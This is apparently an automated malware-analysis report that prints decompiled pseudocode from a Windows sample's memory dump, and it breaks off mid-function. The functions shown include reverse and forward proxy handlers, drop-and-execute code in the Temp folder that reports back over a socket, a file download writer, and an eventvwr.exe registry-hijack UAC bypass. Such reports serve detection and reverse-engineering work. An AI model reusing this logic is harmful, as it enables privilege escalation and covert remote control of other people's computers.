                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0078E981
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EA04
                      • __alloca_probe_16.LIBCMT ref: 0078EA3C
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0078EBAE,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EA97
                      • __alloca_probe_16.LIBCMT ref: 0078EAE6
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EAAE
                        • Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0078EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0078EB2A
                      • __freea.LIBCMT ref: 0078EB55
                      • __freea.LIBCMT ref: 0078EB61
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                      • String ID:
                      • API String ID: 3256262068-0
                      • Opcode ID: e56415624df41af468b43cc49504185334bd6a8fd2c0a7ff70d00d3130e3d766
                      • Instruction ID: b3884724b9d4094c9cee648a831372513d12c52ccf15590d7176cacc61967646
                      • Opcode Fuzzy Hash: e56415624df41af468b43cc49504185334bd6a8fd2c0a7ff70d00d3130e3d766
                      • Instruction Fuzzy Hash: 63910672E802169EDF20AF64CC85EEEBBB5AF09750F144669E805E7191E77CEC40C7A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 71%
                      			E0077E9CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                      				signed int _v8;
                      				short _v270;
                      				short _v272;
                      				char _v528;
                      				char _v700;
                      				signed int _v704;
                      				signed int _v708;
                      				short _v710;
                      				signed int* _v712;
                      				signed int _v716;
                      				signed int _v720;
                      				signed int _v724;
                      				signed int* _v728;
                      				signed int _v732;
                      				signed int _v736;
                      				signed int _v740;
                      				signed int _v744;
                      				signed int _t149;
                      				void* _t156;
                      				signed int _t157;
                      				signed int _t158;
                      				intOrPtr _t159;
                      				signed int _t162;
                      				signed int _t166;
                      				signed int _t167;
                      				intOrPtr _t169;
                      				signed int _t172;
                      				signed int _t173;
                      				signed int _t175;
                      				signed int _t195;
                      				signed int _t196;
                      				signed int _t199;
                      				signed int _t204;
                      				signed int _t207;
                      				intOrPtr* _t213;
                      				intOrPtr* _t214;
                      				signed int _t225;
                      				signed int _t228;
                      				intOrPtr* _t229;
                      				signed int _t231;
                      				signed int* _t235;
                      				void* _t243;
                      				signed int _t244;
                      				intOrPtr _t246;
                      				signed int _t251;
                      				signed int _t253;
                      				signed int _t257;
                      				signed int* _t258;
                      				intOrPtr* _t259;
                      				short _t260;
                      				signed int _t262;
                      				signed int _t264;
                      				void* _t266;
                      				void* _t268;
                      
                      				_t262 = _t264;
                      				_t149 =  *0x7aa00c; // 0x67a7e35e  (__security_cookie)
                      				_v8 = _t149 ^ _t262; // stack-protector canary; re-checked at L2 before returning
                      				_push(__ebx);
                      				_t207 = _a8;
                      				_push(__esi);
                      				_push(__edi);
                      				_t246 = _a4;
                      				_v744 = _t207;
                      				_v728 = E00781CE2(_t207, __ecx, __edx) + 0x278;
                      				_push( &_v708);
                      				_t156 = E0077E118(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                      				_t266 = _t264 - 0x2e4 + 0x18;
                      				if(_t156 != 0) {
                      					_t11 = _t207 + 2; // 0x6
                      					_t251 = _t11 << 4;
                      					__eflags = _t251;
                      					_t157 =  &_v272;
                      					_v716 = _t251;
                      					_t213 =  *((intOrPtr*)(_t251 + _t246));
                      					while(1) {
                      						_v704 = _v704 & 0x00000000;
                      						__eflags =  *_t157 -  *_t213;
                      						_t253 = _v716;
                      						if( *_t157 !=  *_t213) {
                      							break;
                      						}
                      						__eflags =  *_t157;
                      						if( *_t157 == 0) {
                      							L8:
                      							_t158 = _v704;
                      						} else {
                      							_t260 =  *((intOrPtr*)(_t157 + 2));
                      							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                      							_v710 = _t260;
                      							_t253 = _v716;
                      							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                      								break;
                      							} else {
                      								_t157 = _t157 + 4;
                      								_t213 = _t213 + 4;
                      								__eflags = _v710;
                      								if(_v710 != 0) {
                      									continue;
                      								} else {
                      									goto L8;
                      								}
                      							}
                      						}
                      						L10:
                      						__eflags = _t158;
                      						if(_t158 != 0) {
                      							_t214 =  &_v272;
                      							_t243 = _t214 + 2;
                      							do {
                      								_t159 =  *_t214;
                      								_t214 = _t214 + 2;
                      								__eflags = _t159 - _v704;
                      							} while (_t159 != _v704);
                      							_v720 = (_t214 - _t243 >> 1) + 1;
                      							_t162 = E0077F98C(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                      							_v732 = _t162;
                      							__eflags = _t162;
                      							if(_t162 == 0) {
                      								goto L1;
                      							} else {
                      								_v724 =  *((intOrPtr*)(_t253 + _t246));
                      								_t35 = _t207 * 4; // 0xb94f
                      								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                      								_t38 = _t246 + 8; // 0x8b56ff8b
                      								_v740 =  *_t38;
                      								_t223 =  &_v272;
                      								_v712 = _t162 + 4;
                      								_t166 = E007815D4(_t162 + 4, _v720,  &_v272);
                      								_t268 = _t266 + 0xc;
                      								__eflags = _t166;
                      								if(_t166 != 0) {
                      									_t167 = _v704;
                      									_push(_t167);
                      									_push(_t167);
                      									_push(_t167);
                      									_push(_t167);
                      									_push(_t167);
                      									E0077698A();
                      									asm("int3");
                      									_t169 =  *0x7ab508; // 0x0
                      									return _t169;
                      								} else {
                      									__eflags = _v272 - 0x43; // 0x43 = 'C': together with the _v270 == 0 check below, is the locale name exactly "C"?
                      									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                      									if(_v272 != 0x43) {
                      										L19:
                      										_t172 = E0077DE25(_t207, _t223, _t246,  &_v700);
                      										_t225 = _v704;
                      										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                      									} else {
                      										__eflags = _v270;
                      										if(_v270 != 0) {
                      											goto L19;
                      										} else {
                      											_t225 = _v704;
                      											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                      										}
                      									}
                      									__eflags = _t207 - 2;
                      									if(_t207 != 2) {
                      										__eflags = _t207 - 1;
                      										if(_t207 != 1) {
                      											__eflags = _t207 - 5;
                      											if(_t207 == 5) {
                      												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                      											}
                      										} else {
                      											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                      										}
                      									} else {
                      										_t258 = _v728;
                      										_t244 = _t225;
                      										_t235 = _t258;
                      										 *(_t246 + 8) = _v708;
                      										_v712 = _t258;
                      										_v720 = _t258[8];
                      										_v708 = _t258[9];
                      										while(1) {
                      											_t64 = _t246 + 8; // 0x8b56ff8b
                      											__eflags =  *_t64 -  *_t235;
                      											if( *_t64 ==  *_t235) {
                      												break;
                      											}
                      											_t259 = _v712;
                      											_t244 = _t244 + 1;
                      											_t204 =  *_t235;
                      											 *_t259 = _v720;
                      											_v708 = _t235[1];
                      											_t235 = _t259 + 8;
                      											 *((intOrPtr*)(_t259 + 4)) = _v708;
                      											_t207 = _v744;
                      											_t258 = _v728;
                      											_v720 = _t204;
                      											_v712 = _t235;
                      											__eflags = _t244 - 5;
                      											if(_t244 < 5) {
                      												continue;
                      											} else {
                      											}
                      											L27:
                      											__eflags = _t244 - 5;
                      											if(__eflags == 0) {
                      												_t88 = _t246 + 8; // 0x8b56ff8b
                      												_t195 = E007893AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x797410, 0x7f,  &_v528,  *_t88, 1);
                      												_t268 = _t268 + 0x1c;
                      												__eflags = _t195;
                      												_t196 = _v704;
                      												if(_t195 == 0) {
                      													_t258[1] = _t196;
                      												} else {
                      													do {
                      														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                      														_t196 = _t196 + 1;
                      														__eflags = _t196 - 0x7f;
                      													} while (_t196 < 0x7f);
                      													_t199 = E007737C1( &_v528,  *0x7aa170, 0xfe);
                      													_t268 = _t268 + 0xc;
                      													__eflags = _t199;
                      													_t258[1] = 0 | _t199 == 0x00000000;
                      												}
                      												_t103 = _t246 + 8; // 0x8b56ff8b
                      												 *_t258 =  *_t103;
                      											}
                      											 *(_t246 + 0x18) = _t258[1];
                      											goto L38;
                      										}
                      										__eflags = _t244;
                      										if(_t244 != 0) {
                      											 *_t258 =  *(_t258 + _t244 * 8);
                      											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                      											 *(_t258 + _t244 * 8) = _v720;
                      											 *(_t258 + 4 + _t244 * 8) = _v708;
                      										}
                      										goto L27;
                      									}
                      									L38:
                      									_t173 = _t207 * 0xc;
                      									_t110 = _t173 + 0x797350; // 0x74dd8c
                      									 *0x793474(_t246);
                      									_t175 =  *((intOrPtr*)( *_t110))();
                      									_t228 = _v724;
                      									__eflags = _t175;
                      									if(_t175 == 0) {
                      										__eflags = _t228 - 0x7aa2a8;
                      										if(_t228 != 0x7aa2a8) {
                      											_t257 = _t207 + _t207;
                      											__eflags = _t257;
                      											asm("lock xadd [eax], ecx"); // interlocked refcount decrement; the old locale block is freed only when it reaches zero
                      											if(_t257 != 0) {
                      												goto L43;
                      											} else {
                      												_t128 = _t257 * 8; // 0x30ff068b
                      												E007801F5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
                      												_t131 = _t257 * 8; // 0x30ff0c46
                      												E007801F5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                      												_t134 = _t207 * 4; // 0xb94f
                      												E007801F5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                      												_t231 = _v704;
                      												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                      												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                      											}
                      										}
                      										_t229 = _v732;
                      										 *_t229 = 1;
                      										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                      									} else {
                      										 *(_v716 + _t246) = _t228;
                      										_t115 = _t207 * 4; // 0xb94f
                      										E007801F5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                      										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                      										E007801F5(_v732);
                      										 *(_t246 + 8) = _v740;
                      										goto L1;
                      									}
                      									goto L2;
                      								}
                      							}
                      						} else {
                      							goto L2;
                      						}
                      						goto L47;
                      					}
                      					asm("sbb eax, eax");
                      					_t158 = _t157 | 0x00000001;
                      					__eflags = _t158;
                      					goto L10;
                      				} else {
                      					L1:
                      					L2:
                      					return E0076FD1B(_v8 ^ _t262);
                      				}
                      				L47:
                      			}

                      APIs
                        • Part of subcall function 00781CE2: GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
                        • Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D19
                        • Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
                        • Part of subcall function 00781CE2: _abort.LIBCMT ref: 00781D60
                      • _memcmp.LIBVCRUNTIME ref: 0077EC78
                      • _free.LIBCMT ref: 0077ECE9
                      • _free.LIBCMT ref: 0077ED02
                      • _free.LIBCMT ref: 0077ED34
                      • _free.LIBCMT ref: 0077ED3D
                      • _free.LIBCMT ref: 0077ED49
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorLast$_abort_memcmp
                      • String ID: C
                      • API String ID: 1679612858-1037565863
                      • Opcode ID: 30c4e7cd16295351988e3adb3bbd452a7c8fcd1461c21603fba8a7ec9a55e173
                      • Instruction ID: f87e64742c4d5c68cbc1a841e68046407d0bf6da743729fa0186181c3f56b747
                      • Opcode Fuzzy Hash: 30c4e7cd16295351988e3adb3bbd452a7c8fcd1461c21603fba8a7ec9a55e173
                      • Instruction Fuzzy Hash: FCB12775A01219DFDB25DF18C888AADB7B4FB48354F1085EAE94DA7350E734AE90CF80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E0074EEA8(void* __edx, void* __eflags, intOrPtr _a4) {
                      				char _v32;
                      				char _v56;
                      				void* _v60;
                      				char _v72;
                      				char _v76;
                      				char _v80;
                      				char _v88;
                      				char _v92;
                      				void* _v96;
                      				char _v108;
                      				char _v112;
                      				void* __ebx;
                      				void* __edi;
                      				void* __ebp;
                      				intOrPtr* _t24;
                      				void* _t30;
                      				char* _t32;
                      				char* _t35;
                      				intOrPtr _t48;
                      				char* _t49;
                      				char* _t56;
                      				char* _t61;
                      				void* _t64;
                      				intOrPtr _t117;
                      				void* _t121;
                      				void* _t124;
                      				void* _t126;
                      				void* _t127;
                      				void* _t129;
                      				signed int _t131;
                      				void* _t134;
                      				void* _t135;
                      				void* _t136;
                      				void* _t140;
                      
                      				_t142 = __eflags;
                      				_t107 = __edx;
                      				_push(_t64);
                      				_t117 = _a4;
                      				E007420EC(_t64,  &_v76, __edx, __eflags, _t117 + 0x1c);
                      				SetEvent( *(_t117 + 0x34));
                      				_t24 = E00741F95( &_v80);
                      				E007442A6( &_v80,  &_v56, 4, 0xffffffff);
                      				_t134 = (_t131 & 0xfffffff8) - 0x3c;
                      				E007420EC(0x7ac238, _t134, _t107, _t142, 0x7ac238);
                      				_t135 = _t134 - 0x18;
                      				E007420EC(0x7ac238, _t135, _t107, _t142,  &_v72);
                      				_t30 = E00757478( &_v112, _t107);
                      				_t136 = _t135 + 0x30;
                      				_t121 =  *_t24 - 0x46;
                      				if(_t121 == 0) {
                      					E00741E49( &_v88, _t107, __eflags, 1);
                      					_t32 = E00742489();
                      					E00741F95(E00741E49( &_v92, _t107, __eflags, 1));
                      					_t108 = _t32;
                      					_t35 = E0074F69B();
                      					_t123 = _t35;
                      					__eflags = _t35;
                      					if(__eflags == 0) {
                      						_t124 = _t136 - 0x18;
                      						_push("1");
                      						L19:
                      						_t107 = E00742FB7( &_v32, E00741E49( &_v88, _t108, __eflags, 0), 0x7ac238);
                      						E00745343(0x7ac238, _t124, _t37, _t117, __eflags);
                      						_push(0x85);
                      						E00744AA4(0x7ac238, _t117, _t37, __eflags);
                      						E00741FC7();
                      						L20:
                      						E00741E74( &_v108, _t107);
                      						E00741FC7();
                      						E00741FC7();
                      						return 0;
                      					}
                      					 *0x7abd3c = E0074F931(_t123, "StartForward");
                      					 *0x7abd38 = E0074F931(_t123, "StartReverse");
                      					 *0x7abd40 = E0074F931(_t123, "StopForward");
                      					_t48 = E0074F931(_t123, "StopReverse");
                      					_t108 = "GetDirectListeningPort";
                      					 *0x7abd48 = _t48;
                      					_t49 = E0074F931(_t123, "GetDirectListeningPort");
                      					__eflags =  *0x7abd3c;
                      					 *0x7abd44 = _t49;
                      					if(__eflags == 0) {
                      						L17:
                      						_t124 = _t136 - 0x18;
                      						_push("2");
                      						goto L19;
                      					}
                      					__eflags =  *0x7abd38;
                      					if(__eflags == 0) {
                      						goto L17;
                      					}
                      					__eflags =  *0x7abd40;
                      					if(__eflags == 0) {
                      						goto L17;
                      					}
                      					__eflags = _t49;
                      					if(__eflags == 0) {
                      						goto L17;
                      					}
                      					 *0x7abd4c = 1;
                      					E007420EC(0x7ac238, _t136 - 0x18, "GetDirectListeningPort", __eflags, E00741E49( &_v88, "GetDirectListeningPort", __eflags, 0));
                      					_push(0x76);
                      					L10:
                      					E00744AA4(0x7ac238, _t117, _t108, __eflags);
                      					goto L20;
                      				}
                      				_t126 = _t121 - 1;
                      				if(_t126 == 0) {
                      					_t56 =  *0x7abd3c(E00776769(_t53, E00741F95(E00741E49( &_v88, _t107, __eflags, 0))));
                      					_t140 = _t136 - 0x14;
                      					L9:
                      					_t108 = _t56;
                      					E00757226(0x7ac238, _t140, _t56);
                      					_push(0x77);
                      					goto L10;
                      				}
                      				_t127 = _t126 - 1;
                      				if(_t127 == 0) {
                      					__imp__#12( *0x7ac78c);
                      					_t61 =  *0x7abd38(_t30, E00776769(_t58, E00741F95(E00741E49( &_v92, _t107, __eflags, 0))) & 0x0000ffff);
                      					__eflags = _t61;
                      					_t105 =  !=  ? 1 :  *0x7abd4d & 0x000000ff;
                      					 *0x7abd4d =  !=  ? 1 :  *0x7abd4d & 0x000000ff;
                      					_t108 = _t61;
                      					E00757226(0x7ac238, _t136 - 0x10, _t61);
                      					_push(0x78);
                      					goto L10;
                      				}
                      				_t129 = _t127 - 1;
                      				if(_t129 == 0) {
                      					_t56 =  *0x7abd40();
                      					_t140 = _t136 - 0x18;
                      					goto L9;
                      				}
                      				if(_t129 == 1) {
                      					 *0x7abd48();
                      					 *0x7abd4d = 0;
                      				}
                      				goto L20;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Eventinet_ntoa
                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                      • API String ID: 3578746661-168337528
                      • Opcode ID: 179708a092ffb40a923111a1629480cb997eeb7f8006ad3d60df0ad76d29d62c
                      • Instruction ID: 74af67b8f43f0a7cf1836aa350a0e42219eb4718a0c457580b2d45a3ee411ec0
                      • Opcode Fuzzy Hash: 179708a092ffb40a923111a1629480cb997eeb7f8006ad3d60df0ad76d29d62c
                      • Instruction Fuzzy Hash: 92518431B04300DBC714BB74D85E76E3AA5ABC6310F808569F4429B6E3EF2D9949C796
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 73%
                      			E00753D1B(void* __eflags, char _a4, char _a28) {
                      				char _v28;
                      				struct _SHELLEXECUTEINFOA _v88;
                      				char _v112;
                      				char _v136;
                      				char _v316;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t33;
                      				void* _t41;
                      				intOrPtr _t50;
                      				signed int _t60;
                      				char* _t68;
                      				void* _t73;
                      				void* _t87;
                      				void* _t90;
                      
                      				_t93 = __eflags;
                      				_t33 = E00742084(_t60,  &_v136, "\\");
                      				_t86 = E007475C2(_t60,  &_v112, E0077988A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
                      				E00742F93(_t60,  &_v28, _t35, _t93,  &_a4);
                      				E00741FC7();
                      				_t68 =  &_v136;
                      				E00741FC7();
                      				_push(_t68);
                      				_push(_t68);
                      				_t41 = E00753F58(E0074D544( &_v316, _t35, _t93, E00741F95( &_v28), 0x10),  &_v316);
                      				_t94 = _t41;
                      				if(_t41 == 0) {
                      					E00742084(_t60, _t90 - 0x18, 0x79f6bc);
                      					_push(0x6f);
                      					_t73 = 0x7ac800;
                      					goto L6;
                      				} else {
                      					_t86 =  &_a28;
                      					E00753F68( &_v316,  &_a28, _t94);
                      					E0074D4F5( &_v316,  &_a28, _t94);
                      					_v88.hwnd = _v88.hwnd & 0x00000000;
                      					_v88.lpVerb = _v88.lpVerb & 0x00000000;
                      					_v88.cbSize = 0x3c;
                      					_v88.fMask = 0x40;
                      					_t50 = E00741F95( &_v28);
                      					asm("movaps xmm0, [0x7a6090]");
                      					_v88.lpFile = _t50;
                      					asm("movups [ebp-0x40], xmm0");
                      					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
                      					_t96 = _v88.hProcess;
                      					if(_v88.hProcess != 0) {
                      						E00742084(_t60, _t90, 0x79f6bc);
                      						_push(0x70);
                      						E00744AA4(_t60, 0x7ac800,  &_a28, _t96);
                      						WaitForSingleObject(_v88.hProcess, 0xffffffff);
                      						CloseHandle(_v88.hProcess);
                      						DeleteFileA(E00741F95( &_v28));
                      					}
                      					_t97 = _t60 - 1;
                      					if(_t60 == 1) {
                      						E00742084(_t60, _t90 - 0x18, 0x79f6bc);
                      						_push(0x6e);
                      						_t73 = 0x7ac800;
                      						L6:
                      						E00744AA4(_t60, _t73, _t86, _t97);
                      					}
                      				}
                      				E0074CC42( &_v316, 0x79f6bc);
                      				E00741FC7();
                      				E00741FC7();
                      				return E00741FC7();
                      			}

                      APIs
                        • Part of subcall function 00753F68: __EH_prolog.LIBCMT ref: 00753F6D
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0079F6BC), ref: 00753E18
                      • CloseHandle.KERNEL32(00000000), ref: 00753E21
                      • DeleteFileA.KERNEL32(00000000), ref: 00753E30
                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00753DE4
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                      • String ID: <$@$Temp
                      • API String ID: 1704390241-1032778388
                      • Opcode ID: 5048dd0c6f2ae53ce792c809fc864ebdacd48f7651781ea876ec1cd0022995cf
                      • Instruction ID: 498a1294c1981f3d40dde618105900e8c102e60c23082ad5fb05fa6ffe47b072
                      • Opcode Fuzzy Hash: 5048dd0c6f2ae53ce792c809fc864ebdacd48f7651781ea876ec1cd0022995cf
                      • Instruction Fuzzy Hash: 5C414D31900209DBDB14FB64DC5AAFDB775AF51305F904269F506AA0E2EF7C1B8ACB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E007462D8(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                      				intOrPtr _v8;
                      				char _v12;
                      				intOrPtr _v16;
                      				void* _v20;
                      				long _v24;
                      				char _v48;
                      				char _v72;
                      				void _v100076;
                      				void* __ebx;
                      				void* _t37;
                      				WCHAR* _t39;
                      				long _t46;
                      				struct _OVERLAPPED* _t58;
                      				intOrPtr _t77;
                      				long _t81;
                      				void* _t82;
                      				void* _t84;
                      				void* _t87;
                      
                      				E00790D30();
                      				_t74 =  &_a12;
                      				asm("xorps xmm0, xmm0");
                      				_v16 = __ecx;
                      				_t58 = 0;
                      				asm("movlpd [ebp-0x8], xmm0");
                      				_v24 = 0;
                      				E0074331A(0,  &_v48, __eflags, E00747514( &_v72,  &_a12, __eflags, L".part"));
                      				E00741EF0();
                      				_t37 = CreateFileW(E00741EEB( &_v48), 4, 0, 0, 2, 0x80, 0);
                      				_v20 = _t37;
                      				_t84 = _v8 - _a8;
                      				if(_t84 > 0) {
                      					L8:
                      					CloseHandle(_t37);
                      					_t39 = E00741EEB( &_a12);
                      					MoveFileW(E00741EEB( &_v48), _t39);
                      					_t58 = 1;
                      				} else {
                      					_t77 = _a4;
                      					if(_t84 < 0) {
                      						goto L3;
                      					} else {
                      						_t85 = _v12 - _t77;
                      						if(_v12 >= _t77) {
                      							goto L8;
                      						} else {
                      							while(1) {
                      								L3:
                      								_t46 = E00744B5A( &_v100076, 0x186a0);
                      								_t81 = _t46;
                      								asm("cdq");
                      								_v12 = _v12 + _t46;
                      								asm("adc [ebp-0x4], edx");
                      								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
                      								_t82 = _t82 - 0x18;
                      								E007420AB(_t58, _t82, _t74, _t85,  &_v12, 8);
                      								E00744AA4(_t58, _v16, _t74, _t85, 0x57, _v16);
                      								if(_t81 <= 0) {
                      									break;
                      								}
                      								_t87 = _v8 - _a8;
                      								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
                      									continue;
                      								} else {
                      									_t37 = _v20;
                      									goto L8;
                      								}
                      								goto L9;
                      							}
                      							CloseHandle(_v20);
                      							DeleteFileW(E00741EEB( &_v48));
                      						}
                      					}
                      				}
                      				L9:
                      				E00741EF0();
                      				E00741EF0();
                      				return _t58;
                      			}

                      APIs
                        • Part of subcall function 00747514: char_traits.LIBCPMT ref: 0074752F
                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00746331
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00746379
                      • CloseHandle.KERNEL32(00000000), ref: 007463B3
                      • MoveFileW.KERNEL32(00000000,00000000), ref: 007463CB
                      • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 007463EF
                      • DeleteFileW.KERNEL32(00000000), ref: 007463FE
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                      • String ID: .part
                      • API String ID: 820096542-3499674018
                      • Opcode ID: c1e2a1c1afa8afd9d752dcf81d847d6ea2ab74098824d67471bd3eb6a286eae5
                      • Instruction ID: 76b5b1939515a520eba2c0683dc60ba3cc0a0a45d1d0a5f4adf0b710d2d6c385
                      • Opcode Fuzzy Hash: c1e2a1c1afa8afd9d752dcf81d847d6ea2ab74098824d67471bd3eb6a286eae5
                      • Instruction Fuzzy Hash: 3D314875D40219EBCB00EFA4DC9A9EEB779FF04711F50855AF811A3151DB386E84CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00745F77(void* __ebx, void* __ecx, void* __edx) {
                      				char _v28;
                      				char _v52;
                      				void* _t8;
                      				void* _t10;
                      				void* _t11;
                      				void* _t12;
                      				void* _t14;
                      				void* _t21;
                      				void* _t24;
                      				void* _t28;
                      				void* _t50;
                      
                      				_t28 = __ecx;
                      				if( *0x7aa9d0 != 0) {
                      					return 1;
                      				}
                      				_t8 = E00746115(__ecx);
                      				__eflags = _t8 - 0x3a9f;
                      				if(_t8 < 0x3a9f) {
                      					_push(_t28);
                      					E007508E2( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x79f6bc);
                      					_t10 = E00742489();
                      					_t11 = E00741F95(0x7ac560);
                      					_t12 = E00742489();
                      					_t14 = E00741F95( &_v28);
                      					E00750C80(E00741F95(0x7ac518), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
                      					_push(2);
                      					E0074427F(__ebx, _t50 + 0x18 - 0x18, 0x7abb08);
                      					_push(0x79f724);
                      					E00750B4C(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
                      					E0075800F( &_v52, 0x34, "eventvwr.exe");
                      					_t21 = ShellExecuteW(0, L"open", E00741EEB( &_v52), 0x79f724, 0x79f724, 0);
                      					__eflags = _t21 - 0x20;
                      					if(_t21 <= 0x20) {
                      						E00741EF0();
                      						E00741FC7();
                      						_t24 = 2;
                      						return _t24;
                      					}
                      					ExitProcess(0);
                      				}
                      				return _t8;
                      			}

                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 00746046
                      • ExitProcess.KERNEL32 ref: 00746053
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ExecuteExitProcessShell
                      • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                      • API String ID: 1124553745-3923289169
                      • Opcode ID: 28b146608226d5f0a5ecb5a388f1739f7d25d5e5a021279ce2510105d27b1991
                      • Instruction ID: b3c58c6b268a0cfc352c3fcc3fd53ac728defd290112b54ce0f8c0497a5391f3
                      • Opcode Fuzzy Hash: 28b146608226d5f0a5ecb5a388f1739f7d25d5e5a021279ce2510105d27b1991
                      • Instruction Fuzzy Hash: 4811E7A1A51204EBDB04B2E49C5FFFF36699B42701F900039F806E61D3EF5C194A82E6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E007565DD(signed char __ecx, char _a4) {
                      				signed char _v5;
                      				void* _t7;
                      				signed int _t11;
                      				void* _t17;
                      				short* _t21;
                      				signed int _t24;
                      				int _t25;
                      				void* _t28;
                      				void* _t31;
                      
                      				_push(__ecx);
                      				_t21 = 0;
                      				_v5 = __ecx;
                      				_t7 = OpenSCManagerW(0, 0, 2);
                      				_t2 =  &_a4; // 0x755d21
                      				_t24 = _t2;
                      				_t31 = _t7;
                      				_t28 = OpenServiceW(_t31, E00741EEB(_t24), 2);
                      				if(_t28 != 0) {
                      					_t25 = _t24 | 0xffffffff;
                      					_t11 = _v5 & 0x000000ff;
